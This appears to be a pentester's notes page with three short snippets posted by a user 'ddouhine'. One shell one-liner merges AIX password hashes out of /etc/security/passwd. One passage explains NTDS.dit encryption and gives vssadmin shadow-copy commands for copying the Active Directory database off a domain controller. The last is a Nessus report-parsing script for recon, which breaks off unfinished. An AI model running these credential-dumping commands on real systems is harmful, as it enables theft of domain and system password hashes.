ddouhine

grep : /etc/security/passwd > pt1; grep passw passwd | awk '{print $3}' > pt2; paste -d' ' pt1 pt2 > pt3; sed -e 's/ //g' pt3 > passwd_w_shadow; rm pt*

ddouhine

Microsoft stores the Active Directory data in tables in a proprietary ESE database format. The database is contained in the NTDS.dit (%SystemRoot%\ntds\NTDS.dit) file.
This file is encrypted to prevent any data extraction, so we will need to acquire the key to be able to perform the extraction of the target data.
The required Password Encryption Key is stored in the NTDS.dit file, but is encrypted itself with the BOOTKEY.
To obtain this BOOTKEY, we need to acquire a copy of the SYSTEM registry hive (%SystemRoot%\System32\config\System) from the same Domain Controller as we acquired the NTDS.dit file.

Extract NTDS/SYSTEM from a domain controller:
    net start vss
    vssadmin create shadow /for=c:
    vssadmin list shadows
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp

ddouhine

#use to speed up recon when targeting large ip ranges
1. scan targets with nessus
2. filter using #10107 plugin
3. save html report
4. extract urls using this:
#extract IP
grep "<H2 style=\"COLOR" nessus_10107.html | awk -F ">" '{print $2}' > col1
#extract ports
grep ")</H2><SPAN class=" nessus_10107.html | awk -F "/" '{print $2}' | awk -F ")" '{print $1}' > col2
#merge IP:ports